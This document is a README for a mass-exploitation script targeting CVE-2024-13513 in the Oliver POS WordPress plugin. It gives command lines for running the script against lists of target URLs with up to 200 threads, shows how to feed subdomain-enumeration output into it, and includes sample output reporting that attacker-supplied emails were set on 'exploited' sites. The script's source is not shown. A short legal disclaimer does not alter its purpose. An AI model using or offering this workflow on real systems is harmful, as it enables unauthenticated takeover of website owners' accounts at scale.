Usage
Basic Usage
```bash
python3 exploit.py -l targets.txt -e your-email@example.com
```
Advanced Usage
```bash
python3 exploit.py \
    -l targets.txt \
    -e attacker@email.com \
    -t 100 \
    -o /path/to/results
```
Parameters Explanation
| Parameter | Description | Required | Default |
|---|---|---|---|
| `-l`, `--list` | Path to file containing target URLs | ✅ Yes | - |
| `-e`, `--email` | Email address for password reset | ✅ Yes | - |
| `-t`, `--threads` | Number of concurrent threads | ❌ No | 50 |
| `-o`, `--output` | Output directory for results | ❌ No | Current directory |
Input File Format
Create a text file (targets.txt) with one URL per line:
```text
example.com
https://site1.com
http://site2.com
http://192.168.1.100/wordpress
https://vulnerable-site.org/blog
```
Output Files
The tool generates several output files:
vulnerable_targets.txt - All detected vulnerable websites
successfully_exploited.txt - Successfully exploited targets with email
Console Output - Real-time scanning progress and statistics
Example Execution
```bash
python3 exploit.py -l my_targets.txt -e test@hacker.com -t 80
[ INFO ] Loaded 150 unique targets
[ INFO ] Using email: test@hacker.com
[ INFO ] Threads: 80
[ INFO ] Starting scan...
[ CHECKING ] http://example.com/
[ VULNERABLE ] http://example.com/
[ SUCCESS ] Email changed successfully: http://example.com/
[ NOT FOUND ] http://site2.com/
[ PATCHED ] http://site3.com/
==================================================
SCAN STATISTICS:
Checked: 150
Vulnerable: 23
Exploited: 18
Failed: 5
==================================================
[ INFO ] Execution time: 45.23 seconds
```
Advanced Examples
Quick Scan with High Threads
```bash
python3 exploit.py -l urls.txt -e admin@test.com -t 200
```
Save Results to Specific Directory
```bash
python3 exploit.py -l targets.txt -e test@domain.com -o ./scan_results
```
Combine with Other Tools
```bash
# Use with subfinder and httpx
subfinder -d example.com | httpx -silent | tee targets.txt
python3 exploit.py -l targets.txt -e attack@email.com -t 100
```
Important Notes
Legal Disclaimer
⚠️ This tool is for educational and authorized penetration testing purposes only.
Only use on websites you own or have explicit permission to test
Unauthorized access to computer systems is illegal
The authors are not responsible for misuse
Technical Details
Vulnerability: CVE-2024-13513 - Oliver POS Plugin < 2.4.2.4
Impact: Allows unauthenticated email change for password reset
Detection: Checks plugin version and existence
Exploitation: Extracts client token from logs and sends crafted request
Performance Tips
Use 50-150 threads for optimal performance
Ensure stable internet connection
Use quality target lists for better results
Monitor system resources during execution
Troubleshooting
Common Issues:
```bash
# File not found
[ ERROR ] File not found: targets.txt
# Invalid email format
[ ERROR ] Invalid email format
# Network issues
[ CONN ERROR ] example.com
[ TIMEOUT ] example.com
```
Solutions:
Ensure target file exists and is readable
Use valid email address format
Check internet connection and firewall settings
Reduce thread count if experiencing timeouts
Output Interpretation
VULNERABLE: Website has vulnerable plugin version
SUCCESS: Email successfully changed on target
PATCHED: Plugin exists but version is patched
NOT FOUND: Plugin not installed or accessible
CONN ERROR: Connection failed
TIMEOUT: Request timed out
This tool provides comprehensive scanning and exploitation capabilities for security professionals conducting authorized vulnerability assessments.